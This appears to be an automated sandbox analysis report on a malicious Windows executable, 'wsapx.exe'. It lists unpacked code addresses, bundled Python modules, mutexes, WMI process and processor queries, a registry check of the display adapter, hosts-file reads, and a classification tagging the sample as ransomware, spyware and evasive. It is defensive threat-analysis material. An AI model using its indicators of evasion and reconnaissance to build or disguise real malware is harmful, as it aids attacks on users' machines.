Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32435BFA	11_2_00007FFD32435BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD324360C5	11_2_00007FFD324360C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 65_2_00007FFD324453F2	65_2_00007FFD324453F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 65_2_00007FFD325117DE	65_2_00007FFD325117DE
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5EAE10	110_2_00007FF60E5EAE10
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5CABA0	110_2_00007FF60E5CABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D0A2C	110_2_00007FF60E5D0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5F7B24	110_2_00007FF60E5F7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5C1884	110_2_00007FF60E5C1884
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5CB540	110_2_00007FF60E5CB540
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D54C0	110_2_00007FF60E5D54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D1180	110_2_00007FF60E5D1180
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5C82F0	110_2_00007FF60E5C82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E62AF90	110_2_00007FF60E62AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5F5F4C	110_2_00007FF60E5F5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D3030	110_2_00007FF60E5D3030
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5FC00C	110_2_00007FF60E5FC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E62DFD8	110_2_00007FF60E62DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E604FE8	110_2_00007FF60E604FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5EC05C	110_2_00007FF60E5EC05C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5F0074	110_2_00007FF60E5F0074
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5F8040	110_2_00007FF60E5F8040
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5E0104	110_2_00007FF60E5E0104
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E6200F0	110_2_00007FF60E6200F0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E609D74	110_2_00007FF60E609D74
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D1E04	110_2_00007FF60E5D1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5CEE08	110_2_00007FF60E5CEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E611DCC	110_2_00007FF60E611DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E60EEA4	110_2_00007FF60E60EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5CCE84	110_2_00007FF60E5CCE84
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E61FE74	110_2_00007FF60E61FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D8E68	110_2_00007FF60E5D8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E60AE50	110_2_00007FF60E60AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5C9EFC	110_2_00007FF60E5C9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5FAF0C	110_2_00007FF60E5FAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E619B98	110_2_00007FF60E619B98
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E604B38	110_2_00007FF60E604B38
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D8C30	110_2_00007FF60E5D8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E605C8C	110_2_00007FF60E605C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5F0D20	110_2_00007FF60E5F0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5CDD04	110_2_00007FF60E5CDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E616D0C	110_2_00007FF60E616D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5E9D0C	110_2_00007FF60E5E9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5ED97C	110_2_00007FF60E5ED97C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E6069FD	110_2_00007FF60E6069FD
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5C49B8	110_2_00007FF60E5C49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E605A70	110_2_00007FF60E605A70
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5FFA6C	110_2_00007FF60E5FFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5CCB14	110_2_00007FF60E5CCB14
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E62AAC0	110_2_00007FF60E62AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5E67E0	110_2_00007FF60E5E67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D17C8	110_2_00007FF60E5D17C8
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E6118A8	110_2_00007FF60E6118A8
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5C8884	110_2_00007FF60E5C8884
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D2890	110_2_00007FF60E5D2890
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5FD91C	110_2_00007FF60E5FD91C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5F0904	110_2_00007FF60E5F0904
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E60190C	110_2_00007FF60E60190C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5F38E8	110_2_00007FF60E5F38E8
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5FF59C	110_2_00007FF60E5FF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D8598	110_2_00007FF60E5D8598
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5EF5B0	110_2_00007FF60E5EF5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E61260C	110_2_00007FF60E61260C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5F65FC	110_2_00007FF60E5F65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E617660	110_2_00007FF60E617660
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E602700	110_2_00007FF60E602700
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5FA710	110_2_00007FF60E5FA710
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E600710	110_2_00007FF60E600710
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D86C4	110_2_00007FF60E5D86C4
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E6286D4	110_2_00007FF60E6286D4
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5D2360	110_2_00007FF60E5D2360
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5F0374	110_2_00007FF60E5F0374
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5EC3E0	110_2_00007FF60E5EC3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5ED458	110_2_00007FF60E5ED458
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E605468	110_2_00007FF60E605468
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5CA504	110_2_00007FF60E5CA504
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E602164	110_2_00007FF60E602164
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5DE21C	110_2_00007FF60E5DE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E6081CC	110_2_00007FF60E6081CC
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E6241CC	110_2_00007FF60E6241CC
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E6002A4	110_2_00007FF60E6002A4
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E612268	110_2_00007FF60E612268
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5E7244	110_2_00007FF60E5E7244
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5CF24C	110_2_00007FF60E5CF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E61832C	110_2_00007FF60E61832C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E611314	110_2_00007FF60E611314
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5C42E0	110_2_00007FF60E5C42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5DD2C0	110_2_00007FF60E5DD2C0

Source: C:\Users\user\Desktop\wsapx.exe	Code function: String function: 00007FFD94749D60 appears 115 times
Source: C:\Users\user\Desktop\wsapx.exe	Code function: String function: 00007FFD94748E10 appears 90 times
Source: C:\Users\user\Desktop\wsapx.exe	Code function: String function: 00007FF7C71B2910 appears 34 times
Source: C:\Users\user\Desktop\wsapx.exe	Code function: String function: 00007FF7C71B2710 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: String function: 00007FF60E5D8444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: String function: 00007FF60E6049F4 appears 53 times

Source: wsapx.exe

Static PE information: invalid certificate

Source: wsapx.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: wsapx.exe	Binary or memory string: OriginalFilename vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewsmprovhost.exej% vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs wsapx.exe
Source: wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs wsapx.exe
Source: wsapx.exe	Binary or memory string: OriginalFilename vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2671685679.00007FFDA4DAC000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2673128851.00007FFDAC077000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2670503154.00007FFDA3443000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2668723386.00007FFD94492000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython312.dll. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs wsapx.exe
Source: wsapx.exe, 00000002.00000000.2153729398.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewsmprovhost.exej% vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2672140543.00007FFDA549C000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2672409871.00007FFDA5804000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2670756568.00007FFDA347C000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2671280384.00007FFDA4348000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2667660778.00007FFD93D99000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2671488021.00007FFDA46E8000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2670016221.00007FFDA33D8000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilenamelibsslH vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2669284338.00007FFD9473A000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2670276595.00007FFDA3412000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs wsapx.exe
Source: wsapx.exe, 00000002.00000002.2671003578.00007FFDA34E4000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs wsapx.exe
Source: wsapx.exe	Binary or memory string: OriginalFilenamewsmprovhost.exej% vs wsapx.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\Desktop\wsapx.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\wsapx.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
Source: python312.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9994210643762751
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9971739243943192
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9942978533094812

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@177/56@4/3

Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe

Code function: 110_2_00007FF60E5DCAFC GetLastError,FormatMessageW,

110_2_00007FF60E5DCAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5DEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		110_2_00007FF60E5DEF50
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E60B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		110_2_00007FF60E60B57C

Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe

Code function: 110_2_00007FF60E5E3144 GetDiskFreeSpaceExW,

110_2_00007FF60E5E3144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Users\user\Desktop\wsapx.exe	Mutant created: \Sessions\1\BaseNamedObjects\x
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03

Source: C:\Users\user\Desktop\wsapx.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI73722

Jump to behavior

Source: wsapx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\wsapx.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\wsapx.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: wsapx.exe

ReversingLabs: Detection: 39%

Source: wsapx.exe	String found in binary or memory: id-cmc-addExtensions
